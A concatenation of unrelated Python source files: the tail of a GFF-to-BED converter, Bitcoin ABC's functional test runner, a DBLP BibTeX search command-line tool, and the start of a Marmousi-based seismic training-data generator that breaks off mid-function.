block_sizes = f"{cds_stop-cds_start}," # fixme +1 ?
block_starts = "0," # commas are important at the end. no spaces
# according to rseqc (bed.py) code , the expected bed format is
# chrom, chrom_start, chrom_end, gene name, score, strand, cdsStart, cdsEnd,
# blockcount, blocksizes, blockstarts where blocksizes and blocks
# starts are comma separated list. Here is a line example on
# human:
# chr1 1676716 1678658 NM_001145277 0 + 1676725 1678549 0 4 182,101,105, 0,2960,7198
# for now only the feature 'gene' is implemented. We can
# generalize this later on.
if feature == "gene":
gene_name = None
for item in attributes.split(";"):
if item.split("=")[0].strip() == attribute_name:
gene_name = item.split("=")[-1]
assert gene_name
# should be the cds start/stop but for now we use the gene
# info start/stop
msg = f"{chrom_name}\t{gene_start}\t{gene_stop}\t{gene_name}\t{score}\t{strand}\t{cds_start}\t{cds_stop}\t{unknown}\t{block_count}\t{block_sizes}\t{block_starts}\n"
fout.write(msg)
fout.close()
|
test_runner.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Copyright (c) 2017 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
Functional tests are disabled on Windows by default. Use --force to run them anyway.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import argparse
import configparser
import datetime
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
import logging
import xml.etree.ElementTree as ET
import json
import threading
import multiprocessing
from queue import Queue, Empty
# Formatting. Default colors to empty strings.
BOLD, BLUE, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name == 'posix':
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
BLUE = ('\033[0m', '\033[0;34m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
TEST_PARAMS = {
# Some test can be run with additional parameters.
# When a test is listed here, the it will be run without parameters
# as well as with additional parameters listed here.
# This:
# example "testName" : [["--param1", "--param2"] , ["--param3"]]
# will run the test 3 times:
# testName
# testName --param1 --param2
# testname --param3
"wallet_txn_doublespend.py": [["--mineblock"]],
"wallet_txn_clone.py": [["--mineblock"]],
"wallet_multiwallet.py": [["--usecli"]],
}
# Used to limit the number of tests, when list of tests is not provided on command line
# When --extended is specified, we run all tests, otherwise
# we only run a test if its execution time in seconds does not exceed EXTENDED_CUTOFF
DEFAULT_EXTENDED_CUTOFF = 40
DEFAULT_JOBS = (multiprocessing.cpu_count() // 3) + 1
class TestCase():
"""
Data structure to hold and run information necessary to launch a test case.
"""
def __init__(self, test_num, test_case, tests_dir, tmpdir, flags=None):
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.test_case = test_case
self.test_num = test_num
self.flags = flags
def run(self, portseed_offset):
t = self.test_case
portseed = self.test_num + portseed_offset
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = t.split()
tmpdir = [os.path.join("--tmpdir={}", "{}_{}").format(
self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)]
name = t
time0 = time.time()
process = subprocess.Popen([os.path.join(self.tests_dir, test_argv[0])] + test_argv[1:] + self.flags + portseed_arg + tmpdir,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr)
process.wait()
log_stdout.seek(0), log_stderr.seek(0)
[stdout, stderr] = [l.read().decode('utf-8')
for l in (log_stdout, log_stderr)]
log_stdout.close(), log_stderr.close()
if process.returncode == TEST_EXIT_PASSED and stderr == "":
status = "Passed"
elif process.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
return TestResult(name, status, int(time.time() - time0), stdout, stderr)
def on_ci():
return os.getenv('TRAVIS') == 'true' or os.getenv('TEAMCITY_VERSION') != None
def main():
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.join(os.path.abspath(
os.path.dirname(__file__)), "..", "config.ini")
config.read_file(open(configfile))
src_dir = config["environment"]["SRCDIR"]
build_dir = config["environment"]["BUILDDIR"]
tests_dir = os.path.join(src_dir, 'test', 'functional')
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--coverage', action='store_true',
help='generate a basic coverage report for the RPC interface')
parser.add_argument(
'--exclude', '-x', help='specify a comma-seperated-list of scripts to exclude. Do not include the .py extension in the name.')
parser.add_argument('--extended', action='store_true',
help='run the extended test suite in addition to the basic tests')
parser.add_argument('--cutoff', type=int, default=DEFAULT_EXTENDED_CUTOFF,
help='set the cutoff runtime for what tests get run')
parser.add_argument('--force', '-f', action='store_true',
help='run tests even on platforms where they are disabled by default (e.g. windows).')
parser.add_argument('--help', '-h', '-?',
action='store_true', help='print help text and exit')
parser.add_argument('--jobs', '-j', type=int, default=DEFAULT_JOBS,
help='how many test scripts to run in parallel. Default=4.')
parser.add_argument('--keepcache', '-k', action='store_true',
help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true',
help='only print results summary and failure logs')
parser.add_argument('--tmpdirprefix', '-t',
default=tempfile.gettempdir(), help="Root directory for datadirs")
parser.add_argument('--junitouput', '-ju',
default=os.path.join(build_dir, 'junit_results.xml'), help="file that will store JUnit formated test results.")
args, unknown_args = parser.parse_known_args()
# Create a set to store arguments and create the passon string
tests = set(arg for arg in unknown_args if arg[:2] != "--")
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
passon_args.append("--configfile={}".format(configfile))
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
# Create base test directory
tmpdir = os.path.join("{}", "bitcoin_test_runner_{:%Y%m%d_%H%M%S}").format(
args.tmpdirprefix, datetime.datetime.now())
os.makedirs(tmpdir)
logging.debug("Temporary test directory at {}".format(tmpdir))
enable_wallet = config["components"].getboolean("ENABLE_WALLET")
enable_utils = config["components"].getboolean("ENABLE_UTILS")
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if config["environment"]["EXEEXT"] == ".exe" and not args.force:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print(
"Tests currently disabled on Windows by default. Use --force option to enable")
sys.exit(0)
if not (enable_wallet and enable_utils and enable_bitcoind):
print(
"No functional tests to run. Wallet, utils, and bitcoind must all be enabled")
print(
"Rerun `configure` with -enable-wallet, -with-utils and -with-daemon and rerun make")
sys.exit(0)
# Build list of tests
all_scripts = get_all_scripts_from_disk(tests_dir, NON_SCRIPTS)
# Check all tests with parameters actually exist
for test in TEST_PARAMS:
if not test in all_scripts:
print("ERROR: Test with parameter {} does not exist, check it has "
"not been renamed or deleted".format(test))
sys.exit(1)
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the all_scripts list. Accept the name with or without .py
# extension.
test_list = [t for t in all_scripts if
(t in tests or re.sub(".py$", "", t) in tests)]
# Allow for wildcard at the end of the name, so a single input can
# match multiple tests
for test in tests:
if test.endswith('*'):
test_list.extend(
[t for t in all_scripts if t.startswith(test[:-1])])
# Make the list unique
test_list = list(set(test_list))
# do not cut off explicitly specified tests
cutoff = sys.maxsize
else:
# No individual tests have been specified.
# Run all tests that do not exceed
test_list = all_scripts
cutoff = args.cutoff
if args.extended:
cutoff = sys.maxsize
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
for exclude_test in args.exclude.split(','):
if exclude_test + ".py" in test_list:
test_list.remove(exclude_test + ".py")
# Use and update timings from build_dir only if separate
# build directory is used. We do not want to pollute source directory.
build_timings = None
if (src_dir != build_dir):
build_timings = Timings(os.path.join(build_dir, 'timing.json'))
# Always use timings from scr_dir if present
src_timings = Timings(os.path.join(
src_dir, "test", "functional", 'timing.json'))
# Add test parameters and remove long running tests if needed
test_list = get_tests_to_run(
test_list, TEST_PARAMS, cutoff, src_timings, build_timings)
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script
# and exit.
parser.print_help()
subprocess.check_call(
[os.path.join(tests_dir, test_list[0]), '-h'])
sys.exit(0)
if not args.keepcache:
shutil.rmtree(os.path.join(build_dir, "test",
"cache"), ignore_errors=True)
run_tests(test_list, build_dir, tests_dir, args.junitouput,
config["environment"]["EXEEXT"], tmpdir, args.jobs, args.coverage, passon_args, build_timings)
def run_tests(test_list, build_dir, tests_dir, junitouput, exeext, tmpdir, num_jobs, enable_coverage=False, args=[], build_timings=None):
# Warn if bitcoind is already running (unix only)
try:
pidofOutput = subprocess.check_output(["pidof", "bitcoind"])
if pidofOutput is not None and pidofOutput != b'':
print("{}WARNING!{} There is already a bitcoind process running on this system. Tests may fail unexpectedly due to resource contention!".format(
BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = os.path.join(build_dir, "test", "cache")
if os.path.isdir(cache_dir):
print("{}WARNING!{} There is a cache directory here: {}. If tests fail unexpectedly, try deleting the cache directory.".format(
BOLD[1], BOLD[0], cache_dir))
# Set env vars
if "BITCOIND" not in os.environ:
os.environ["BITCOIND"] = os.path.join(
build_dir, 'src', 'bitcoind' + exeext)
os.environ["BITCOINCLI"] = os.path.join(
build_dir, 'src', 'bitcoin-cli' + exeext)
flags = [os.path.join("--srcdir={}".format(build_dir), "src")] + args
flags.append("--cachedir={}".format(cache_dir))
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug(
"Initializing coverage directory at {}".format(coverage.dir))
else:
coverage = None
if len(test_list) > 1 and num_jobs > 1:
# Populate cache
try:
subprocess.check_output(
[os.path.join(tests_dir, 'create_cache.py')] + flags + [os.path.join("--tmpdir={}", "cache") .format(tmpdir)])
except Exception as e:
print(e.output)
raise e
# Run Tests
time0 = time.time()
test_results = execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags)
runtime = int(time.time() - time0)
max_len_name = len(max(test_list, key=len))
print_results(test_results, max_len_name, runtime)
save_results_as_junit(test_results, junitouput, runtime)
if (build_timings is not None):
build_timings.save_timings(test_results)
if coverage:
coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(
map(lambda test_result: test_result.was_successful, test_results))
sys.exit(not all_passed)
def execute_test_processes(num_jobs, test_list, tests_dir, tmpdir, flags):
update_queue = Queue()
job_queue = Queue()
test_results = []
poll_timeout = 10 # seconds
# In case there is a graveyard of zombie bitcoinds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
portseed_offset = int(time.time() * 1000) % 625
##
# Define some helper functions we will need for threading.
##
def handle_message(message, running_jobs):
"""
handle_message handles a single message from handle_test_cases
"""
if isinstance(message, TestCase):
running_jobs.add(message.test_case)
print("{}{}{} started".format(BOLD[1], message.test_case, BOLD[0]))
return
if isinstance(message, TestResult):
test_result = message
running_jobs.remove(test_result.name)
test_results.append(test_result)
if test_result.status == "Passed":
print("{}{}{} passed, Duration: {} s".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
elif test_result.status == "Skipped":
print("{}{}{} skipped".format(
BOLD[1], test_result.name, BOLD[0]))
else:
print("{}{}{} failed, Duration: {} s\n".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
print(BOLD[1] + 'stdout:' + BOLD[0])
print(test_result.stdout)
print(BOLD[1] + 'stderr:' + BOLD[0])
print(test_result.stderr)
return
assert False, "we should not be here"
def handle_update_messages():
"""
handle_update_messages waits for messages to be sent from handle_test_cases via the
update_queue. It serializes the results so we can print nice status update messages.
"""
printed_status = False
running_jobs = set()
while True:
message = None
try:
message = update_queue.get(True, poll_timeout)
if message is None:
break
# We printed a status message, need to kick to the next line
# before printing more.
if printed_status:
print()
printed_status = False
handle_message(message, running_jobs)
update_queue.task_done()
except Empty as e:
if not on_ci():
print("Running jobs: {}".format(", ".join(running_jobs)), end="\r")
sys.stdout.flush()
printed_status = True
def handle_test_cases():
"""
job_runner represents a single thread that is part of a worker pool.
It waits for a test, then executes that test.
It also reports start and result messages to handle_update_messages
"""
while True:
test = job_queue.get()
if test is None:
break
# Signal that the test is starting to inform the poor waiting
# programmer
update_queue.put(test)
result = test.run(portseed_offset)
update_queue.put(result)
job_queue.task_done()
##
# Setup our threads, and start sending tasks
##
# Start our result collection thread.
t = threading.Thread(target=handle_update_messages)
t.setDaemon(True)
t.start()
# Start some worker threads
for j in range(num_jobs):
t = threading.Thread(target=handle_test_cases)
t.setDaemon(True)
t.start()
# Push all our test cases into the job queue.
for i, t in enumerate(test_list):
job_queue.put(TestCase(i, t, tests_dir, tmpdir, flags))
# Wait for all the jobs to be completed
job_queue.join()
# Wait for all the results to be compiled
update_queue.join()
# Flush our queues so the threads exit
update_queue.put(None)
for j in range(num_jobs):
job_queue.put(None)
return test_results
def print_results(test_results, max_len_name, runtime):
results = "\n" + BOLD[1] + "{} | {} | {}\n\n".format(
"TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0]
test_results.sort(key=lambda result: result.name.lower())
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
status = TICK + "Passed" if all_passed else CROSS + "Failed"
results += BOLD[1] + "\n{} | {} | {} s (accumulated) \n".format(
"ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0]
results += "Runtime: {} s\n".format(runtime)
print(results)
class TestResult():
"""
Simple data structure to store test result values and print them properly
"""
def __init__(self, name, status, time, stdout, stderr):
self.name = name
self.status = status
self.time = time
self.padding = 0
self.stdout = stdout
self.stderr = stderr
def __repr__(self):
if self.status == "Passed":
color = BLUE
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "{} | {}{} | {} s\n".format(
self.name.ljust(self.padding), glyph, self.status.ljust(7), self.time) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def get_all_scripts_from_disk(test_dir, non_scripts):
"""
Return all available test script from script directory (excluding NON_SCRIPTS)
"""
python_files = set([t for t in os.listdir(test_dir) if t[-3:] == ".py"])
return list(python_files - set(non_scripts))
def get_tests_to_run(test_list, test_params, cutoff, src_timings, build_timings=None):
"""
Returns only test that will not run longer that cutoff.
Long running tests are returned first to favor running tests in parallel
Timings from build directory override those from src directory
"""
def get_test_time(test):
if build_timings is not None:
timing = next(
(x['time'] for x in build_timings.existing_timings if x['name'] == test), None)
if timing is not None:
return timing
# try source directory. Return 0 if test is unknown to always run it
return next(
(x['time'] for x in src_timings.existing_timings if x['name'] == test), 0)
# Some tests must also be run with additional parameters. Add them to the list.
tests_with_params = []
for test_name in test_list:
# always execute a test without parameters
tests_with_params.append(test_name)
params = test_params.get(test_name)
if params is not None:
tests_with_params.extend(
[test_name + " " + " ".join(p) for p in params])
result = [t for t in tests_with_params if get_test_time(t) <= cutoff]
result.sort(key=lambda x: (-get_test_time(x), x))
return result
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir={}'.format(self.dir)
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - {}\n".format(i)) for i in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `test/functional/test-framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r') as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r') as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
def save_results_as_junit(test_results, file_name, time):
"""
Save tests results to file in JUnit format
See http://llg.cubic.org/docs/junit/ for specification of format
"""
e_test_suite = ET.Element("testsuite",
{"name": "bitcoin_abc_tests",
"tests": str(len(test_results)),
# "errors":
"failures": str(len([t for t in test_results if t.status == "Failed"])),
"id": "0",
"skipped": str(len([t for t in test_results if t.status == "Skipped"])),
"time": str(time),
"timestamp": datetime.datetime.now().isoformat('T')
})
for test_result in test_results:
e_test_case = ET.SubElement(e_test_suite, "testcase",
{"name": test_result.name,
"classname": test_result.name,
"time": str(test_result.time)
}
)
if test_result.status == "Skipped":
ET.SubElement(e_test_case, "skipped")
elif test_result.status == "Failed":
ET.SubElement(e_test_case, "failure")
# no special element for passed tests
ET.SubElement(e_test_case, "system-out").text = test_result.stdout
ET.SubElement(e_test_case, "system-err").text = test_result.stderr
ET.ElementTree(e_test_suite).write(
file_name, "UTF-8", xml_declaration=True)
class Timings():
"""
Takes care of loading, merging and saving tests execution times.
"""
def __init__(self, timing_file):
self.timing_file = timing_file
self.existing_timings = self.load_timings()
def load_timings(self):
if os.path.isfile(self.timing_file):
with open(self.timing_file) as f:
return json.load(f)
else:
return []
def get_merged_timings(self, new_timings):
"""
Return new list containing existing timings updated with new timings
Tests that do not exists are not removed
"""
key = 'name'
merged = {}
for item in self.existing_timings + new_timings:
if item[key] in merged:
merged[item[key]].update(item)
else:
merged[item[key]] = item
# Sort the result to preserve test ordering in file
merged = list(merged.values())
merged.sort(key=lambda t, key=key: t[key])
return merged
def save_timings(self, test_results):
# we only save test that have passed - timings for failed test might be
# wrong (timeouts or early fails)
passed_results = [t for t in test_results if t.status == 'Passed']
new_timings = list(map(lambda t: {'name': t.name, 'time': t.time},
passed_results))
merged_timings = self.get_merged_timings(new_timings)
with open(self.timing_file, 'w') as f:
json.dump(merged_timings, f, indent=True)
if __name__ == '__main__':
main()
|
cli.py
|
import argparse
import requests
import json
import sys
from simple_term_menu import TerminalMenu
from pygments import highlight
from pygments.lexers.bibtex import BibTeXLexer
from pygments.formatters import TerminalFormatter
from multiprocess import Process, Manager
import shutil
def fullname(str1):
# split the string into a list
lst = str1.split()
newspace = ""
for l in lst[:-1]:
newspace += (l[0].upper() + '. ')
newspace += lst[-1].title()
return newspace
def args_parser():
parser = argparse.ArgumentParser()
parser.add_argument(
'query', metavar="QUERY", nargs='+', help='Search query')
parser.add_argument('--all', action='store_true', help='print all hits')
return parser.parse_args()
def query(query_lst):
manager = Manager()
hits = manager.dict()
results = []
for q in query_lst:
r = requests.get('http://dblp.uni-trier.de/search/publ/api',
params={'q': q, 'h': 100, 'format': 'json'})
if r.status_code == 429:
raise Error
json_answer = r.json()
res = json_answer["result"]["hits"].get("hit", None)
if res is None:
continue
results += res
def f(d, hit, n):
if hit is None:
return
authors = hit["info"].pop("authors")
if isinstance(authors["author"], dict):
hit["info"]["authors"] = authors["author"]["text"]
else:
hit["info"]["authors"] = [
fullname(a["text"]) for a in authors["author"]]
hit["info"]["bibtex"] = get_bib(hit["info"]["key"])
d[n] = hit["info"]
job = [Process(target=f, args=(hits, hit, n))
for n, hit in enumerate(results)]
_ = [p.start() for p in job]
_ = [p.join() for p in job]
return dict(hits)
def shorten_authors(authlist):
if len(authlist) > 3:
return ", ".join(authlist[0:3]) + ", et al."
return ", ".join(authlist)
def menu(hits):
width = shutil.get_terminal_size((80, 20))[0]
max_author_width = max([len(shorten_authors(v["authors"])) for k, v in hits.items()])
offset = 2
third_col = 30
first_col = max_author_width + 1
second_col = width - third_col - first_col - offset
items = []
for k, v in hits.items():
authors = shorten_authors(v["authors"])
items.append("{author:<{first_col}}{title:<{second_col}}{venue:>{third_col}}|{k}".format(
author=authors.strip(), title=v["title"].strip(),
venue=v["venue"].strip(), k=k, first_col=first_col,
second_col=second_col,third_col=third_col))
def return_bib(k):
code = hits[int(k)].get("bibtex", "")
formatter = TerminalFormatter(bg="dark")
return highlight(code, BibTeXLexer(), formatter)
terminal_menu = TerminalMenu(
items, preview_command=return_bib, preview_size=0.75)
menu_entry_index = terminal_menu.show()
return menu_entry_index
def get_bib(key):
r = requests.get(f"http://dblp.uni-trier.de/rec/bib2/{key}.bib")
return r.text.strip()
def main():
args = args_parser()
input_raw = query(args.query)
hits = {}
for key,value in input_raw.items():
if value not in hits.values():
hits[key] = value
if hits is None:
sys.exit()
if args.all:
for k,v in hits.items():
print(v["bibtex"])
else:
item = menu(hits)
if item is not None:
print(hits[item]["bibtex"])
if __name__ == "__main__":
main()
|
generate_data.py
|
#%%
# Fetch data from reproducibility.org
#sf.Fetch('marm','marmvel.hh')
# #%% [markdown]
# ## Generating the model
# First we create model by augmenting Marmousi II
#%% [markdown]
# ## Generator features
#
# ### Several layers can be generated from a single one
#
# ### Velocities are exactly the same as in mother-model (Marmousi)
#
#%%
#(c) Vladimir Kazei, Oleg Ovcharenko; KAUST 2020
# cell with imports
import importlib
import multiprocessing
import os
import os.path
import sys
import time
import pickle
import threading
import random
from numba import jit
# madagascar API
import m8r as sf
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import numpy.matlib as matlib
import pydot
#plt.rcParams.update({'font.size': 5002})
#plt.rcParams['figure.figsize'] = [10, 5]
import seaborn
import tensorflow as tf
# images
from IPython import get_ipython
from keras import backend as K
from keras.utils import multi_gpu_model
from numpy.random import randint, seed
from scipy import ndimage
from skimage.transform import resize
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score
#import styler
from myutils import (cd, cmd, const, elastic_transform, plt_nb_T, toc, aug_flip,
merge_dict, np_to_rsf, rsf_to_np, nrms, tf_random_flip_channels)
from myutils import const as c
seed()
# set up matplotlib
matplotlib.rc('image', cmap='RdBu_r')
seaborn.set_context('paper', font_scale=5)
CUDA_VISIBLE_DEVICES = "1,2,3"
os.environ["CUDA_VISIBLE_DEVICES"]=CUDA_VISIBLE_DEVICES
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
# Madagascar binaries will be stored in DATAPATH (RAM on Linux recommended)
cmd("mkdir /dev/shm/RSFTMP")
cmd("chmod 777 /dev/shm/RSFTMP")
os.environ["DATAPATH"]="/dev/shm/RSFTMP/"
#%%
alpha_deform = 500
sigma_deform = 50
def generate_model(model_input=c.trmodel,
model_output="marm.rsf",
dx=c.dx,
stretch_X=1,
training_flag=False,
random_state_number=c.random_state_number,
distort_flag=True,
crop_flag=True,
verbose=False,
test_flag=False,
show_flag=False):
# downscale marmousi
#def rescale_to_dx(rsf_file_in, rsf_file_out, dx)
model_orig = sf.Input(model_input)
vel = model_orig.read()
if test_flag:
n_cut = int(((const.sxbeg + const.gxbeg) * const.dx) // (model_orig.float("d1")))
vel = np.concatenate((vel[-n_cut:,:], np.flipud(vel), vel[:n_cut,:]), axis = 0)
else:
vel = np.concatenate((vel, np.flipud(vel), vel), axis = 0)
if show_flag:
np.random.RandomState(random_state_number)
random.seed(random_state_number)
np.random.seed(random_state_number)
if crop_flag:
vel_log_res = vel
#vel_log_res = resize(vel_log_res[:,:], (np.shape(vel)[0]//2, np.shape(vel)[1]//2))
if verbose:
print(f"Random state number = {random_state_number}")
#vel = resize(vel_log_res, vel.shape)
l0 = randint(np.shape(vel)[0])
#print(f"l0={l0}")
h0 = min(l0 + np.shape(vel)[0]//4 + randint(np.shape(vel)[0]//2),
np.shape(vel)[0])
l1 = randint(np.shape(vel)[1]//3)
h1 = min(l1 + np.shape(vel)[1]//3 + randint(np.shape(vel)[1]//2),
np.shape(vel)[1])
if verbose:
print(l0, l1, h0, h1)
vel_log_res = vel_log_res[l0:h0, l1:h1]
vel = resize(vel_log_res, vel.shape)
# we downscale
scale_factor = dx / model_orig.float("d1")
vel = resize(vel[:,:], (stretch_X*np.shape(vel)[0]//scale_factor, np.shape(vel)[1]//scale_factor))
if verbose:
print(np.shape(vel))
print(f"Model downscaled {scale_factor} times to {dx} meter sampling")
if stretch_X != 1:
print(f"Model stretched {stretch_X} times to {dx} meter sampling \n")
# we concatenate horizontally, this is confusing because of flipped axis in madagascar
vel = np.atleast_3d(vel)
if distort_flag:
vel = elastic_transform(vel, alpha_deform, sigma_deform, v_dx=dx, random_state_number=random_state_number)
vel = np.squeeze(vel)
if distort_flag:
vel_alpha = (0.8+0.4*resize(np.random.rand(5,10), vel.shape))
#print(vel_alpha)
vel *= vel_alpha
# add water
# vel = np.concatenate((1500*np.ones((vel.shape[0], 20)), vel),
# axis=1)
#vel = ndimage.median_filter(vel, size=(7,3))
#vel = 1500 * np.ones_like(vel)
if verbose:
print(f"Writing to {model_output}")
np_to_rsf(vel, model_output)
return vel
def show_model_generation():
stretch_X_train = c.stretch_X_train
vel = generate_model(stretch_X=stretch_X_train, training_flag=False, crop_flag=False, distort_flag=False, random_state_number=randint(10000))
vel = rsf_to_np("marmvel.hh")
plt_nb_T(aug_flip(vel), dx=4, dz=4, fname="../latex/Fig/marm_aug")
vel = generate_model(stretch_X=stretch_X_train, distort_flag=False, random_state_number=c.random_state_number, show_flag=True)
plt_nb_T(vel, fname="../latex/Fig/cropMarm")
N = np.shape(vel)
vel_example = elastic_transform(np.atleast_3d(vel), alpha_deform, sigma_deform,
random_state_number=c.random_state_number, plot_name="Normal")
N = np.shape(vel)
vel_example = generate_model(stretch_X=stretch_X_train, training_flag=True, random_state_number=c.random_state_number, show_flag=True)
vel1 = generate_model(stretch_X=stretch_X_train, training_flag=False, random_state_number=randint(10000))
vel2 = generate_model(stretch_X=stretch_X_train, training_flag=False, random_state_number=randint(10000))
vel3 = generate_model(stretch_X=stretch_X_train, training_flag=False, random_state_number=randint(10000))
vel4 = generate_model(stretch_X=stretch_X_train, training_flag=False, random_state_number=randint(10000))
plt_nb_T(np.concatenate((vel_example, vel1, vel2, vel3, vel4), axis=1), fname="../latex/Fig/random_model_example")
# model data and sort into CMPs function
def generate_rsf_data(model_name="marm.rsf", central_freq=c.central_freq, dt=c.dt, dx=c.dx,
nt=c.nt, sxbeg=c.sxbeg, gxbeg=c.gxbeg, szbeg=c.szbeg,
jsx=c.jsx, jgx=c.jgx, jdt=c.jdt,
logs_out="logs.rsf", shots_out="shots_cmp.rsf",
full_shots_out=None):
#get size of the model
model_orig = sf.Input(model_name)
Nx = model_orig.int("n2")
print(Nx)
ns = (Nx - 2*sxbeg)//jgx
ng = 2*(sxbeg-gxbeg)//jgx + 1
print(f"Total number of shots = {ns}")
t_start = time.time()
cmd((f"sfgenshots < {model_name} csdgather=y fm={central_freq} amp=1 dt={dt} ns={ns} ng={ng} nt={nt} "
f"sxbeg={sxbeg} chk=n szbeg={szbeg} jsx={jgx} jsz=0 gxbeg={gxbeg} gzbeg={szbeg} jgx={jgx} jgz=0 > shots.rsf"))
print(f"Modeling time for {ns} shots = {time.time()-t_start}")
if full_shots_out != None:
cmd(f"sfcp < shots.rsf > {full_shots_out}")
# ## Analyze and filter the data set generated
# correct header and reduce sampling in time jdt (usually 4) times
cmd(f"sfput < shots.rsf d3={jgx*dx} | sfwindow j1={jdt} | sfbandpass flo=2 fhi=4 > shots_decimated.rsf")
cmd(f"sfrm shots.rsf")
# sort into cmp gathers and discard odd cmps and not full cmps
cmd(f"sfshot2cmp < shots_decimated.rsf half=n | sfwindow j3=2 f3={ng//2} n3={ns} > {shots_out}")
print(f"sfshot2cmp < shots_decimated.rsf half=n | sfwindow j3=2 f3={ng//2} n3={ns} > {shots_out}")
# cmd(f"sfrm shots_decimated.rsf")
# cmd(f"sfrm shots_decimated.rsf")
# create the logs -- training outputs
cmd(f"sfsmooth < {model_name} rect2=2 | sfwindow f2={sxbeg} j2={jsx} n2={ns} > {logs_out}")
#cmd(f"sfin < {logs_out}")
return 0
#@profile
def generate_rsf_data_multi(model_name="marm.rsf", central_freq=c.central_freq, dt=c.dt,
nt=c.nt, sxbeg=c.sxbeg, gxbeg=c.gxbeg, szbeg=c.szbeg,
jsx=c.jsx, jgx=c.jgx, jdt=c.jdt,
logs_out="logs.rsf", shots_out="shots_cmp.rsf", iShotBlock=None):
cmd(f"mkdir /dev/shm/RSFTMP/data_{iShotBlock}")
